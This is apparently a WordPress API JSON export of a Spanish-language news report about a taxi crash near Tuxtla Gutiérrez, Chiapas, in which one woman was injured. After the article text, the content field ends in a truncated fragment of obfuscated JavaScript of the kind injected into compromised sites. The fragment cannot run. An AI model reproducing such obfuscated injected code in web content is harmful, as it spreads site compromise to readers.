{"id":21466,"date":"2025-04-15T02:29:53","date_gmt":"2025-04-15T02:29:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21466"},"modified":"2025-04-15T02:29:54","modified_gmt":"2025-04-15T02:29:54","slug":"taxi-foraneo-impacto-a-particular","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21466","title":{"rendered":"Taxi for\u00e1neo impacto a particular"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250414-WA0026-1024x576.jpg\" alt=\"\" class=\"wp-image-21467\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250414-WA0026-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250414-WA0026-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250414-WA0026-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250414-WA0026.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 14 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana en el tramo Tuxtla-La Angostura un taxi for\u00e1neo Vw Jetta con n\u00famero econ\u00f3mico TT185 impact\u00f3 a un Vw Virtus de color blanco.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el taxi transitaba de Poniente a Oriente e invadi\u00f3 carril y choc\u00f3 de frente contra el particular, a la altura de la Ribera Playa Vista.<\/p>\n\n\n\n<p>Por el choque una mujer result\u00f3 lesionada la cual fue atendida por param\u00e9dicos de Protecci\u00f3n Civil la cual fue trasladada al hospital Gilberto G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Elementos de la Guardia Nacional se hicieron cargo de las diligencias y una gr\u00faa llev\u00f3 las unidades a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 14 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana en el tramo Tuxtla-La Angostura un taxi for\u00e1neo Vw Jetta con n\u00famero econ\u00f3mico TT185 impact\u00f3 a un Vw Virtus de color blanco. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el taxi transitaba de Poniente a Oriente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21467,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21466","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21466","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21466"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21466\/revisions"}],"predecessor-version":[{"id":21468,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21466\/revisions\/21468"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21467"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21466"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21466"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21466"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}